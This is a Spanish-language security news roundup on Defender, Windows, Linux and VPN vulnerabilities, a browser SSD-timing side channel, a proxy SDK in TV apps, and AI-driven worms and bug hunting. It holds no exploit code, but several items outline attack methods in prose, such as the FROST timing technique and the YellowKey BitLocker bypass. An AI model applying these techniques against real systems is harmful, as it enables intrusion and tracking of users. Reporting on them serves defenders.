RoguePlanet: (otra) vulnerabilidad Zero-Day de Microsoft Defender

El investigador de seguridad anónimo conocido como Chaotic Eclipse (también conocido como Nightmare-Eclipse) ha publicado una prueba de concepto (PoC) de un exploit para otra vulnerabilidad de día cero de Microsoft Defender llamada RoguePlanet.

"El exploit es una condición de carrera, por lo que su efectividad es variable", declaró el investigador, quien publicó el exploit bajo una nueva cuenta de GitHub llamada "MSNightmare". "He logrado un 100% de éxito en algunas máquinas, mientras que en otras ha tenido dificultades para funcionar".

Si el exploit tiene éxito, se obtiene una shell con privilegios de nivel SYSTEM, lo que permite al atacante ejecutar código arbitrario o realizar acciones no autorizadas. El investigador afirmó que el exploit se ha probado en máquinas con Windows 11 y 10 con las actualizaciones de Patch Tuesday de junio de 2026 instaladas, lo que significa que funciona en las versiones más recientes del sistema operativo de escritorio.

Sin embargo, el exploit no funciona en instancias de Windows Server en su forma actual, ya que "los usuarios estándar no pueden montar una imagen ISO". Chaotic Eclipse destacó que las instalaciones de Windows Server también son vulnerables a la falla y que el exploit necesita ser rediseñado para que funcione. "Lograr que esta prueba de concepto funcionara me agotó por completo; afectó gravemente mi salud mental y física, pero a finales de mayo [sic] se desarrolló una prueba de concepto completa", dijo el investigador.

"Los esfuerzos de Microsoft para proteger a Defender de los ataques de redirección de ruta son inútiles. También tengo varias vulnerabilidades de corrupción de memoria en Defender, sin mencionar otras vulnerabilidades que tengo en varios componentes".

El investigador de seguridad Will Dormann, en una publicación compartida en Mastodon, dijo: "Según se informa, no es 100% confiable, pero me funcionó al primer intento". RoguePlanet es la última de una serie de vulnerabilidades descubiertas por Chaotic Eclipse en los últimos meses.

Estas divulgaciones descoordinadas forman parte de lo que se considera una represalia tras una supuesta falta de comunicación entre el investigador, que no se ha identificado públicamente, y Microsoft.

En publicaciones firmadas criptográficamente en su blog, Chaotic Eclipse expresó su descontento con la forma en que Microsoft gestionó el proceso de divulgación y criticó a la compañía por revocar el acceso a su cuenta del Centro de Respuesta de Seguridad de Microsoft (MSRC), donde los investigadores pueden reportar vulnerabilidades. El investigador también acusó a Microsoft de humillarlo, desestimar sus informes, no compensarlo por las vulnerabilidades identificadas y difamarlo.

A finales del mes pasado, Microsoft condenó las divulgaciones públicas de vulnerabilidades, afirmando que "nunca se justifican" y que exponen a los clientes a un "riesgo innecesario". Cabe destacar que las tres vulnerabilidades de Defender mencionadas anteriormente ya han sido explotadas.

La disputa pública también ha provocado el cierre de sus cuentas de GitHub y GitLab. "Microsoft está intentando abusar de su propiedad de GitHub para proteger únicamente sus propios productos, y de sus amplios vínculos con las fuerzas del orden, calificando la publicación de información sobre vulnerabilidades en sus propios productos como un comportamiento delictivo", declaró el investigador de seguridad Kevin Beaumont.

"Para que quede claro nuestro enfoque en materia legal, no tenemos intención de emprender acciones legales contra las personas que realizan o publican investigaciones sobre seguridad", afirmó Microsoft en una publicación de X. "Cuando una persona infringe la ley y participa en actividades maliciosas que causan un daño real a nuestros clientes, colaboraremos con las fuerzas del orden según corresponda".

Fuente: THN

Seguir leyendo...

Actualizaciones de seguridad de JUNIO para todas las empresas

En el Patch Tuesday de junio de 2026, Microsoft public'o actualizaciones de seguridad para 200 fallos y tres vulnerabilidades Zero-Days divulgadas públicamente. Este parche aborda 33 vulnerabilidades "críticas", de las cuales 28 son de ejecución remota de código, 4 de elevación de privilegios y 1 es un fallo de divulgación de información. 

A continuación se muestra el número de errores en cada categoría de vulnerabilidad:

• 65 Vulnerabilidades de elevación de privilegios
• 19 Vulnerabilidades de omisión de funciones de seguridad
• 55 Vulnerabilidades de ejecución remota de códig
• 30 vulnerabilidades de divulgación de información
• 7 vulnerabilidades de denegación de servicio
• 27 vulnerabilidades de suplantación de identidad

Estos fallos no incluye los de Mariner, Azure HorizonDB, Microsoft Copilot, Copilot Chat, M365 Copilot, Microsoft Exchange Online y Microsoft Graph, que Microsoft corrigió a principios de este mes.

Además, Google corrigió 360 fallos de Microsoft Edge/Chromium este mes, los cuales tampoco se incluye en este resumen.

Para obtener más información sobre las actualizaciones no relacionadas con la seguridad publicadas hoy, consulte nuestros artículos dedicados a las Windows 11 KB5094126 & KB5093998 cumulative updates y Windows 10 KB5094127 extended security update..

Vulnerabilidades destacadas

La actualización de seguridad de este mes corrige tres vulnerabilidades de día cero que se habían hecho públicas, ninguna de las cuales se sabe que haya sido explotada en ataques.

• CVE-2026-45586 - Vulnerabilidad de elevación de privilegios en el Marco de Traducción Colaborativa de Windows (CTFMON) que otorga privilegios de SYSTEM. "La resolución incorrecta de enlaces antes del acceso a archivos (seguimiento de enlaces) en el Marco de Traducción Colaborativa de Windows permite a un atacante autorizado elevar privilegios localmente", explica Microsoft.

Microsoft atribuyó la vulnerabilidad a un investigador anónimo, pero BleepingComputer ha descubierto que se trata de una corrección para la vulnerabilidad de día cero "GreenPlasma", divulgada por el investigador de seguridad Nightmare Eclipse.GreenPlasma es una vulnerabilidad de escalamiento de privilegios que podría explotarse para obtener una shell con permisos de SYSTEM.

Por último, la actualización de junio de 2026 también corrige MiniPlasma, una vulnerabilidad independiente revelada por Chaotic Eclipse como una solución incompleta para CVE-2020-17103, que Microsoft ya había abordado en diciembre de 2020. "Para solucionar de forma integral la vulnerabilidad identificada por CVE-2020-17103 y recientemente denominada públicamente "MiniPlasma", Microsoft recomienda instalar las actualizaciones de junio de 2026 para sus sistemas operativos Windows", indicó el gigante tecnológico en una actualización de su aviso.

Nightmare Eclipse ha publicado una serie de vulnerabilidades de día cero para Windows, entre ellas BlueHammer, MiniPlasma, RedSun, UnDefend y YellowKey (también corregida hoy), en protesta por la gestión de Microsoft de sus programas de recompensas por detección de errores y divulgación de vulnerabilidades.

• CVE-2026-49160 - Vulnerabilidad de denegación de servicio en HTTP.sys, conocida como HTTP/2 Bomb, que fue revelada este mes por investigadores de la empresa de seguridad ofensiva Calif. "El consumo descontrolado de recursos en HTTP/2 permite a un atacante no autorizado denegar el servicio en una red", explica Microsoft.

El ataque HTTP/2 Bomb es una técnica de denegación de servicio que aprovecha la forma en que el protocolo HTTP/2 comprime y gestiona las cabeceras del tráfico web, permitiendo a los atacantes enviar cantidades muy pequeñas de datos que obligan a los servidores a asignar cantidades desproporcionadamente grandes de memoria.

Los investigadores descubrieron que el ataque podía aumentar drásticamente el uso de memoria en los servidores afectados. Los atacantes también pueden mantener la memoria ocupada manipulando la configuración de control de flujo, impidiendo que el servidor libere recursos y pudiendo causar problemas de rendimiento o interrupciones del servicio.

Para ayudar a mitigar este ataque, Microsoft ha introducido una nueva configuración de registro llamada "MaxHeadersCount" para limitar la cantidad de encabezados en una solicitud, junto con un boletín de soporte sobre cómo usarla.

Microsoft también introdujo una nueva configuración de registro llamada MaxHeadersCount. Esta configuración permite limitar la cantidad de encabezados incluidos en las solicitudes HTTP/2 y HTTP/3 que acepta el servidor HTTP. Para obtener más información, consulte el artículo KB5102602.

• CVE-2026-50507 - Vulnerabilidad de omisión de la función de seguridad BitLocker de Windows, previamente divulgada públicamente, que permitía a atacantes locales acceder a una unidad cifrada. "Un fallo en el mecanismo de protección de BitLocker de Windows permite a un atacante no autorizado eludir una función de seguridad mediante un ataque físico", explica Microsoft.

Si bien Microsoft atribuyó la vulnerabilidad a un investigador anónimo, BleepingComputer ha descubierto que se trata de una solución para la vulnerabilidad YellowKey, también divulgada públicamente el mes pasado por el investigador de ciberseguridad Nightmare Eclipse.

La vulnerabilidad YellowKey podía explotarse colocando archivos especialmente diseñados en una unidad USB o partición EFI e iniciando el Entorno de recuperación de Windows (WinRE). Al mantener presionada la tecla CTRL, se activaba una consola de comandos con acceso ilimitado a las unidades cifradas protegidas con BitLocker.

La vulnerabilidad afecta principalmente a los sistemas que utilizan la protección BitLocker solo con TPM en dispositivos Windows 11 y Windows Server 2022/2025. Microsoft ya había compartido soluciones temporales para este problema, como habilitar la autenticación TPM+PIN en lugar de depender únicamente de la protección TPM.

Otras vulnerabilidades importantes a destacar se enumeran a continuación:

• CVE-2026-47291 ( CVSS: 9.8): Un fallo de desbordamiento de enteros o de bucle en el archivo HTTP.sys de Windows que permite a un atacante no autorizado ejecutar código a través de la red.
• CVE-2026-44815 (CVSS: 9.8): Una vulnerabilidad de desbordamiento de búfer basado en pila en el cliente DHCP de Windows que permite a un atacante no autorizado ejecutar código a través de la red. "Este fallo no requiere credenciales ni acción del usuario y puede convertir el tráfico de red en una vulneración total del sistema", declaró Alex Vovk, director ejecutivo y cofundador de Action1, sobre CVE-2026-44815. "Un atacante podría enviar tráfico de red especialmente diseñado a un sistema configurado para servicios DHCP".

Fuente: BC

Seguir leyendo...

FROST: permite a sitios web rastrear qué sitios y aplicaciones abre a través de SSD Timing

El ataque, llamado FROST, no necesita código nativo, extensión ni solicitud de permiso. Un sitio web malicioso puede determinar qué sitios se visitan y qué aplicaciones se abren, utilizando nada más que JavaScript y la sincronización de la SSD. 

Investigadores de la Universidad Tecnológica de Graz lo construyeron y lo describieron en un nuevo artículo que aparecerá en el congreso DIMVA 2026 en Grecia. Abusa de una función de almacenamiento presente en todos los principales navegadores de escritorio, y el canal de sincronización subyacente funciona tanto en macOS como en Linux.

Los ataques de sincronización de SSD no son nuevos. El año pasado, el mismo grupo publicó Secret Spilling Drive, que lee el comportamiento del usuario en un disco observando cómo las lecturas se ralentizan cuando algo más lo está usando. El problema era que necesitaba código nativo en la máquina, a través de una interfaz de bajo nivel como io_uring de Linux. FROST elimina ese requisito. Se ejecuta dentro del entorno limitado del navegador, lo que convierte un ataque local en uno remoto. Ya no es necesario estar en la máquina para sacarlo.

El mismo laboratorio de Graz ya lo ha hecho antes. Su ataque SnailLoad dedujo los sitios y vídeos que una víctima cargó únicamente a partir de la latencia de la red, sin ningún JavaScript.

Cómo funciona el ataque FROST

La forma de ingresar está el Origin Private File System, u OPFS, una función de almacenamiento que los navegadores agregaron en 2023 para que las aplicaciones web como los editores en el navegador y los IDE puedan mantener archivos en el disco. OPFS le da a cada origen su propia porción protegida del sistema de archivos y, debido a que esa porción está aislada, omite la solicitud de permiso que una página normalmente necesita para acceder a sus archivos. Sin diálogo, sin clic. Un sitio puede simplemente empezar a escribir.

Normalmente, el sistema operativo oculta la sincronización del disco detrás del caché de la página, ofreciendo lecturas repetidas desde la memoria para que nunca toquen la unidad.

FROST soluciona esto creando un archivo más grande que la RAM de la máquina. El caché no puede contenerlo todo, por lo que las lecturas siguen llegando al SSD. En Chrome y Safari, OPFS puede crecer hasta el 60% del espacio en disco, mucho más que suficiente; Firefox limita cada origen a un nivel más bajo, aunque un atacante puede distribuir la carga entre múltiples orígenes para superarlo.

Un sitio web malicioso puede determinar qué sitios visita y qué aplicaciones abre, utilizando nada más que JavaScript y la sincronización de la SSD. El ataque, llamado FROST, no necesita código nativo, extensión ni solicitud de permiso.

Luego, el código del atacante lee fragmentos aleatorios de 4 kB de ese archivo en un bucle y cronometra cada lectura con performance.now(). Los navegadores reducen sus temporizadores de forma predeterminada para dificultar este tipo de medición, pero el atacante vuelve a agudizar la resolución activando el aislamiento entre orígenes, lo que puede hacer libremente en su propia página.

Cuando abres un sitio o inicias una aplicación en el mismo disco, esa actividad compite con las lecturas del atacante y el tiempo cambia considerablemente. Una red neuronal entrenada en esos rastros identifica el sitio o la aplicación.

La precisión es la parte incómoda. En una Mac, frente a los 50 sitios web principales, FROST identificó el sitio visitado con una puntuación del 88,95% en una prueba de mundo cerrado y se mantuvo en 86,95% en una prueba de mundo abierto que agregó 300 sitios que nunca había visto. Para diez aplicaciones macOS nativas preinstaladas, alcanzó el 95,83%.

Si bien el canal de sincronización también funciona en Linux, el equipo ejecutó el clasificador completo solo en macOS, por lo que esos números de huellas digitales son un resultado de macOS. FROST también sólo detecta actividad en el mismo disco que su archivo OPFS.

Una computadora portátil de un solo disco pone todo en ese disco; una estación de trabajo con varias unidades oculta todo lo que se ejecuta en una unidad separada, aunque los inicios de aplicaciones que tocan el directorio de inicio tienden a filtrarse de todos modos.

Qué se puede hacer

No mucho, por ahora. A Google, Mozilla y Apple se les informó antes de la publicación. El equipo de Chromium de Google no trata las huellas dactilares como una vulnerabilidad de seguridad. Apple lo consideró fuera de alcance, pero dejó espacio para una mitigación más adelante. Mozilla lo reconoció y no envió nada. No existe CVE ni evidencia pública de que la técnica se haya utilizado en la naturaleza.

Eso deja las defensas débiles. La medición solo se ejecuta mientras la página del atacante está abierta, por lo que cerrar la pestaña finaliza la ejecución. Observar el almacenamiento de su navegador en busca de un archivo de varios gigabytes inexplicable es otra señal, aunque los navegadores no hacen que el uso de OPFS sea fácil de ver.

En Linux, los sistemas que ejecutan profile-sync-daemon, una utilidad que mantiene el perfil del navegador en la RAM, están protegidos incidentalmente contra la versión sin clic, porque las escrituras OPFS nunca llegan al SSD. La variante más débil, en la que una página utiliza un cuadro de diálogo de selección de archivos para que usted mismo seleccione un archivo grande, todavía funciona.

Las soluciones que realmente lo cerrarían recaen en los fabricantes de navegadores: limitar el tamaño de OPFS para que el archivo quepa en la memoria y no genere contención, acelerar los temporizadores de alta resolución mientras OPFS está en uso o colocar un mensaje de permiso delante de él. Cada uno cuesta algo en velocidad o usabilidad, lo cual es parte de por qué ninguno de ellos ha sucedido.

El verdadero desacuerdo es si un sitio web que aprende silenciosamente lo que usted hace en su propia máquina es un error o una característica que funciona según lo diseñado. La verdadera preocupación de los investigadores es estructural: los navegadores siguen dando a las aplicaciones web un acceso casi nativo al hardware, y el acceso casi nativo trae consigo fugas casi nativas. FROST es una API. El patrón es lo que hay que tener en cuenta.

Fuente: THN

Seguir leyendo...

Vulnerabilidad de un solo caracter en el kernel de Linux permite el acceso de root

La vulnerabilidad, identificada como CVE-2026-23111, reside en el código de filtrado de paquetes nf_tables del kernel y fue corregida el 5 de febrero de 2026. Exodus Intelligence publicó su análisis técnico completo el 8 de junio, y cabe destacar que no es el primer exploit público: FuzzingLabs publicó una reproducción independiente en abril.

La vulnerabilidad se reduce a un solo carácter erróneo y una comprobación invertida en nf_tables, y la corrección implementada en el kernel la eliminó en una sola línea. Ubuntu califica la vulnerabilidad con CVSS 7.8 (alto).

La configuración vulnerables es común: nf_tables más espacios de nombres de usuario sin privilegios, una característica de Linux que permite que una cuenta ordinaria actúe como root dentro de un entorno aislado privado y acceda a código del kernel al que de otro modo no podría acceder.

Ambas características vienen incluidas por defecto en la mayoría de los equipos de escritorio y en muchas configuraciones de servidor. No existe un vector de ataque remoto por sí sola. Se trata de una vulnerabilidad que un atacante explota tras obtener acceso, convirtiendo una shell con pocos privilegios, un contenedor comprometido o una cuenta de servicio en root en el host.

Oliver Sieber, investigador de Exodus, quien descubrió la vulnerabilidad a principios de 2025, la convirtió en un root local completo. El exploit activa el uso de memoria liberada (use-after-free), elude las protecciones de memoria integradas del kernel y, posteriormente, toma el control de la ejecución para obtener root y salir del espacio de nombres del contenedor.

Lo demostró en Debian Bookworm, Debian Trixie, Ubuntu 22.04 LTS y Ubuntu 24.04 LTS. FuzzingLabs reprodujo el fallo en RHEL 10 antes de Pwn2Own Berlin 2026, creando su propio exploit de root por una ruta diferente. El cronograma es ajustado: la solución se publicó el 5 de febrero, FuzzingLabs publicó el 16 de abril y el informe detallado de Exodus se publicó el 8 de junio.

La técnica ahora está documentada en Debian, Ubuntu y Red Hat. Dado que el fallo se encuentra en la rama principal, cualquier distribución que haya distribuido un kernel vulnerable con ambas características habilitadas está expuesta, a menos que las medidas de seguridad o las restricciones de espacio de nombres de la distribución bloqueen el acceso.

CVE-2026-23111 se produce en medio de una intensa oleada de divulgaciones de vulnerabilidades de root local en Linux. En las últimas semanas han surgido Copy Fail, la cadena Dirty Frag, su variante Fragnesia, DirtyDecrypt y una vulnerabilidad de ptrace de nueve años de antigüedad que lee /etc/shadow y ejecuta comandos como root.

Difieren en los detalles, pero comparten la característica que debería preocupar a los expertos en seguridad: un punto de acceso sin privilegios se convierte en root en instalaciones normales.

El error solo afecta al sistema local y requiere espacios de nombres de usuario sin privilegios, por lo que conviene centrarse primero en los sistemas que permiten que usuarios o cargas de trabajo no confiables los creen.

Ubuntu tiene correcciones para las versiones 22.04, 24.04 y 25.10, y Debian corrigió Bookworm y Trixie, con una retrocompatibilidad para Bullseye LTS 6.1. Red Hat, SUSE y Amazon Linux también monitorean la vulnerabilidad; consulte el aviso de su distribución para obtener el paquete del kernel correspondiente, ya que la versión corregida exacta varía. La corrección original consistió en una sola línea de código.

Hay un panorama más amplio. En un análisis reciente del aumento de vulnerabilidades LPE, Synacktiv vincula la rapidez de este aumento con la investigación asistida por IA y la comparación de parches, que permite la propagación de exploits funcionales antes de que se difundan las correcciones. Además, argumenta que el endurecimiento habitual de los sistemas sigue dando tiempo a los defensores.

La mayoría de estas vulnerabilidades se basan en funciones opcionales del kernel o configuraciones predeterminadas poco estrictas, por lo que restringir el acceso de usuarios sin privilegios (en este caso, los espacios de nombres de usuario) retrasa la explotación hasta que se implemente el parche.

No existen informes públicos de explotación en la práctica, ni se ha vinculado a ningún actor malicioso con ella. El parche se publicó en febrero, y el código del exploit es público desde abril.

Fuente: THN

Seguir leyendo...

Explotan vulnerabilidad crítica en la VPN de Check Point

Check Point ha alertado sobre la explotación activa de una vulnerabilidad crítica que afecta a las implementaciones de VPN de acceso remoto y acceso móvil configuradas para usar el protocolo de intercambio de claves IKEv1, actualmente obsoleto.

La vulnerabilidad, identificada como CVE-2026-50751 (CVSS: 9.3), consiste en una debilidad en el flujo lógico de la validación de certificados que permite a un atacante remoto no autenticado eludir la autenticación de usuario y establecer una conexión VPN de acceso remoto sin una contraseña válida.

"Al explotar una vulnerabilidad lógica en la validación de certificados, un atacante puede establecer una sesión VPN sin poseer una contraseña válida, eludiendo así los requisitos de autenticación", declaró Check Point. "Se requiere actividad adicional posterior a la autenticación para acceder a recursos internos o escalar privilegios".

La vulnerabilidad afecta a los siguientes productos y versiones:

• Security Gateways R82.10 Jumbo Hotfix Take 19 o inferior, R82 Jumbo Hotfix Take 103 o inferior, R81.20 Jumbo Hotfix Take 141 o inferior, R81.10 (EOS), R81 (EOS) y R80.40 (EOS)
• Spark Firewalls: R80.20.X (EOS), R81.10.X y R82.00.X

Para explotar la vulnerabilidad con éxito, se deben cumplir las siguientes condiciones:

• El acceso remoto VPN o el acceso móvil deben estar habilitados.
• IKEv1 debe estar habilitado para el acceso remoto.
• Los gateways deben aceptar clientes de acceso remoto heredados.
• Los gateways no deben requerir un certificado de máquina para las conexiones.

La empresa israelí de ciberseguridad indicó que detectó los primeros indicios de actividad sospechosa el 4 de junio de 2026, y que la primera explotación observada data del 7 de mayo de 2026. Se afirma que los esfuerzos de explotación se intensificaron a partir de este año. mes.

Check Point añadió que la actividad de explotación se ha limitado a "unas pocas docenas de organizaciones objetivo a nivel mundial". En un caso, la fase posterior a la explotación se ha asociado con una filial del ransomware Qilin.

"Creemos que la infraestructura de este actor de amenazas está explotando otras vulnerabilidades relacionadas con VPN, como las publicadas por Palo Alto Networks, Fortinet y F5", señaló. "Identificamos indicadores que sugieren que el actor podría usar el protocolo Tox para comunicarse, un patrón comúnmente asociado con los actores de ransomware con fines lucrativos".

Un aspecto clave es el uso de una infraestructura de servidor virtual privado (VPS) para llevar a cabo los ataques. Específicamente, esto implica depender de servidores VPS geolocalizados en un país específico para atacar a organizaciones dentro de sus fronteras. Una vez establecido el acceso, se descubrió que los atacantes intentaban descargar archivos ELF maliciosos de la infraestructura controlada por el actor.

Algunos aspectos de estos esfuerzos coinciden con un informe de Ctrl-Alt-Intel del mes pasado, que destacaba el abuso por parte del grupo de ransomware de los dispositivos VPN corporativos para el acceso inicial.

Un análisis más detallado de los componentes VPN afectados ha revelado una segunda vulnerabilidad, CVE-2026-50752 (CVSS: 7,40), que podría permitir un ataque de intermediario (AitM) en las conexiones VPN de sitio a sitio. No existen indicios de que esta vulnerabilidad haya sido explotada en ataques reales.

Fuente: THN

Seguir leyendo...

Aplicaciones gratuitas convierten televisores en servidores proxy para IA

Un investigador ha realizado ingeniería inversa al SDK de iOS que Bright Data incorpora en aplicaciones de consumo y ha documentado cómo convierte dispositivos, incluidos televisores inteligentes siempre encendidos, en nodos de salida que transmiten el tráfico web para un negocio de datos que Bright Data comercializa fuertemente en la industria de la IA.

La empresa, sucesora de Luminati, opera lo que llama la red de proxy residencial más grande del mundo, anunciada en más de 400 millones de IP residenciales. Parte de ese suministro proviene de este SDK, que se incluye dentro de aplicaciones gratuitas detrás de una pantalla de suscripción y se describe como un grupo de más de 150 millones de direcciones IP "obtenidas mediante consentimiento".

Los hallazgos, publicados el 5 de junio por Include Security y el investigador independiente Buchodi, son importantes porque el scraping proviene de la IP doméstica del usuario, no de la del cliente. El riesgo inmediato no es una cuenta pirateada o datos robados; es que una conexión doméstica y su ancho de banda se utilizan como infraestructura de raspado de otra persona.

Un televisor conectado es casi ideal para eso: generalmente enchufado, con una conexión rápida, efectivamente no medido y sin mirar.

La evidencia técnica más profunda proviene del SDK de iOS; El alcance de la televisión inteligente se basa en el soporte de la plataforma de Bright Data, su lista de socios públicos y sus informes anteriores. La investigación encontró que el canal de pares que realiza trabajos de scraping no tiene autenticación real y, en iOS, su tráfico pasa por alto una VPN configurada.

Dentro del túnel de pares

Cuando se abre la aplicación, el SDK se pone en contacto con uno de los servidores de Bright Data, que entrega sus instrucciones sin comprobar realmente quién pregunta. A partir de ese momento, el servidor puede indicarle al dispositivo que vaya a buscar páginas de otros sitios web, utilizando la conexión a Internet del hogar del usuario para hacerlo.

El investigador descubrió que el canal que realiza esas tareas no tiene ninguno de los controles de seguridad habituales y lo describió como más débil que los controles integrados en la mayoría del malware.

En los iPhone, el investigador descubrió que este tráfico pasa por una VPN y que gran parte de lo que hace la aplicación no aparece en las herramientas que los equipos de seguridad normalmente usan para monitorear las aplicaciones. El dispositivo también puede seguir transmitiendo en segundo plano mientras alguien mira la pantalla o atiende una llamada, siempre que la batería no esté baja.

La brecha de consentimiento

La pantalla de suscripción no coincide con lo que realmente permite el SDK. En una aplicación de Roku, Petflix, la pantalla decía que usaría el dispositivo y su conexión "ocasionalmente".

La configuración que carga el SDK permite hasta 200 GB de tráfico al mes. En algunos países, incluidos Uzbekistán y Omán, los límites son mucho más altos y el dispositivo puede seguir funcionando casi hasta que se agote la batería. El SDK también puede unir el teléfono de una persona y las computadoras que ejecutan las aplicaciones de la misma empresa, tratándolos como un solo usuario.

Bright Data publica su lista de socios de aplicaciones en una página que cualquiera puede abrir e incluye creadores de aplicaciones de televisión inteligente como PlayWorks Digital, CloudTV y Longvision. El investigador tiene cuidado de señalar que estar en la lista solo muestra que una empresa trabajó con Bright Data en algún momento, no que su aplicación incluya el SDK en la actualidad. Habría que comprobar cada uno por separado.

Un modelo antiguo, impulsado por la demanda de IA

Nada de esto es nuevo en cuanto a forma, sólo en escala. Bright Data es el sucesor de Luminati, el servicio de proxy pago que surgió de Hola VPN. En 2015, Hola fue sorprendida vendiendo el ancho de banda de sus usuarios gratuitos como nodos de salida a través de Luminati, a 20 dólares el gigabyte. El mismo modelo funciona ahora en la caja siempre encendida del salón.

Lo que cambió es el comprador. Las defensas anti-bot de Cloudflare, DataDome y otros bloquean los scrapers provenientes de las IP de los centros de datos, por lo que los scrapers de IA se dirigen a través de conexiones residenciales.

Krebs informó en octubre de 2025 que los servidores proxy de botnets como Aisuru están impulsando la recolección de datos de IA a gran escala, y Google desmanteló la red proxy criminal IPIDEA en enero. Esas operaciones secuestran los dispositivos de los consumidores; Bright Data dice que sus nodos de salida optan por participar a través de una pantalla de consentimiento. Ese consentimiento es la línea divisoria entre ambos, y si es significativo es la cuestión abierta.

Lowpass  apareció en febrero, y este es el desmontaje técnico. Desde entonces, Google, Amazon y Roku han restringido los SDK de proxy en segundo plano, y Bright Data eliminó esas plataformas, aunque todavía incluye Tizen de Samsung y webOS de LG.

Qué hacer

El tráfico es fácil de detectar y bloquear. En una red doméstica, el paso más sencillo es bloquear las direcciones web que utiliza el SDK para conectarse, con una herramienta a nivel de enrutador como Pi-hole o NextDNS.

Los principales son proxyjs.brdtnet.com, proxyjs.luminatinet.com, proxyjs.bright-sdk.com, clientdk.bright-sdk.com y clientdk.brdtnet.com. Según la investigación, bloquearlos impide que el dispositivo actúe como un proxy sin afectar el servicio pago de Bright Data, que se ejecuta en direcciones separadas.

Las empresas que administran los teléfonos del personal también pueden buscar aplicaciones que incluyan el SDK. Un problema: en una conexión móvil, el tráfico evita el Wi-Fi de la oficina, por lo que un bloqueo de red por sí solo no siempre lo captará. Bright Data también podría cambiar la forma en que se conecta el SDK en el futuro, lo que significaría que es necesario actualizar cualquier lista de bloqueo.

Fuente: THN

Seguir leyendo...

Agentes de IA permiten gusanos adaptativos

Investigadores de la Universidad de Toronto, el Vector Institute, la Universidad de Cambridge y ServiceNow demostraron que un gusano informático impulsado por IA, que utiliza Grandes Modelos de Lenguaje de peso abierto y un arnés agéntico especializado, puede propagarse de forma autónoma y explotar adaptativamente objetivos heterogéneos a través de una red.

El gusano logró la explotación del 73.8% y la replicación al 61.8% de los hosts objetivo en promedio en entornos simulados, incluyendo la explotación exitosa de vulnerabilidades divulgadas recientemente.

La investigación, realizada en un laboratorio digital cerrado al exterior, mostró que un gusano impulsado por modelos de IA abiertos puede tomar control de una red completa, apropiarse de capacidad de cómputo de las máquinas infectadas y usar esos recursos para continuar su expansión. El alcance de la amenaza abarca desde computadoras portátiles hasta sistemas de climatización y redes eléctricas, de acuerdo con Nicolas Papernot, uno de los autores del trabajo.

El investigador explicó que el equipo decidió divulgar los hallazgos después de revisar el estudio para eliminar cualquier información que pudiera ayudar a actores maliciosos. Antes de publicarlo, los autores compartieron sus resultados con organismos nacionales de ciencia, seguridad y defensa.

El trabajo se centró en modelos de IA de "pesos abiertos", que cualquier persona puede descargar y modificar de forma gratuita. Los investigadores quisieron poner a prueba la idea, extendida en parte de la comunidad de ciberseguridad, de que esos modelos más pequeños no tienen suficiente capacidad para causar daños reales.

Para hacerlo, construyeron una prueba de concepto en un sistema seguro y cerrado que simuló el comportamiento de un gusano de IA en una red de decenas de dispositivos interconectados, entre ellos portátiles, impresoras y cámaras.

A diferencia de un gusano tradicional, que sigue un guion fijo programado por humanos y fracasa si encuentra una defensa para la que no fue diseñado, el prototipo evaluó cada objetivo, adaptó su ataque y luego se copió en la siguiente máquina.

El estudio mostró que el gusano podía reunir información mientras avanzaba por la red: cada intrusión revelaba contraseñas y puntos débiles que facilitaban el acceso al siguiente equipo. Esa capacidad de ajuste hace que una sola defensa no baste para frenarlo.

Papernot explicó que el programa amplía su radio de acción a costa de las propias víctimas. Una vez instalado en una máquina, el gusano desvía potencia de procesamiento para sostener su razonamiento y preparar el siguiente ataque, lo que elimina en los hechos el costo de cada nueva infección.

De acuerdo con el portal, la principal diferencia con trabajos anteriores es que este prototipo no se limita a propagarse a través de aplicaciones de inteligencia artificial, sino que puede operar fuera de esos sistemas y atacar el software subyacente. Eso amplía de forma directa el universo de dispositivos en riesgo.

"Cada dispositivo conectado a Internet, portátiles, cámaras, termostatos inteligentes y todo lo demás, se convierte en un objetivo potencial, aunque no sea por los datos que almacena, sí como punto de apoyo para atacar objetivos más valiosos", indicó Papernot.

El prototipo no descubre vulnerabilidades desconocidas, a diferencia de modelos más potentes y fuertemente protegidos como Claude Mythos de Anthropic. Aun así, en un entorno abierto podría acceder a Internet, localizar avisos sobre fallas recién detectadas y explotarlas antes de que lleguen los parches de software.

Medidas concretas para reducir el riesgo

"En un mundo interconectado, ningún sistema es inmune a esta amenaza", señaló Papernot. "Compartir estos hallazgos es el primer paso para movilizar a investigadores, líderes de la industria y responsables políticos para que actúen, y rápido", agregó.

El profesor pidió a los profesionales de tecnología reforzar cualquier ajuste de seguridad que pueda dejar expuestos sus sistemas y sostuvo que los usuarios también deben intervenir. Sus recomendaciones fueron concretas: mantener los dispositivos actualizados, usar contraseñas robustas y activar la autenticación multifactor.

Fuente: AI Agents Enable Adaptive Computer Worms

Seguir leyendo...

Agente de IA descubre 21 vulnerabilidades Zero-Day en FFmpeg y Chrome corrige la cifra récord de 429 errores

Esta semana se produjeron dos acontecimientos con pocos días de diferencia. Una startup de seguridad informó de 21 vulnerabilidades hasta entonces desconocidas en FFmpeg, la biblioteca multimedia presente en prácticamente todos los productos relacionados con el vídeo. Todas ellas fueron descubiertas por un agente de IA autónomo.

Esa misma semana, Google lanzó Chrome 149 con parches para 429 fallos de seguridad, la mayor cantidad jamás registrada en una sola versión.

Solo los fallos de FFmpeg fueron detectados por IA. El récord de Chrome se produjo después de que Google renovara su programa de recompensas para gestionar la avalancha de informes generados por IA. Los mecanismos difieren, pero la presión es la misma: la IA está poniendo más vulnerabilidades al alcance de quienes deben solucionarlas, y a mayor velocidad que antes.

Los hallazgos sobre FFmpeg provienen de DepthFirst, cuyo agente de seguridad autónomo analizó las aproximadamente 1,5 millones de líneas de código C del proyecto y produjo 21 vulnerabilidades de día cero confirmadas, cada una con una prueba de concepto reproducible.

La empresa estima que el coste de la prueba fue de unos 1.000 dólares. Varios de los errores habían permanecido latentes durante 15 a 20 años; un desbordamiento de pila en el código de la tabla de descripción de servicios data de 2003 y permaneció sin corregir durante 23 años.

La mayoría son desbordamientos de pila o de montón en analizadores y demultiplexores, que abarcan componentes desde el demultiplexor TS hasta el decodificador VP9. DepthFirst afirma que algunos ya tienen identificadores CVE; su informe enumera nueve, del CVE-2026-39210 al CVE-2026-39218, y señala que el resto están corregidos pero aún no numerados. También publicó una prueba de concepto.

Por otro lado, Chrome 149 corrige 429 vulnerabilidades, un récord para una sola versión. Más de 100 son críticas o de alta gravedad, principalmente de uso de memoria liberada y validación de entrada insuficiente.

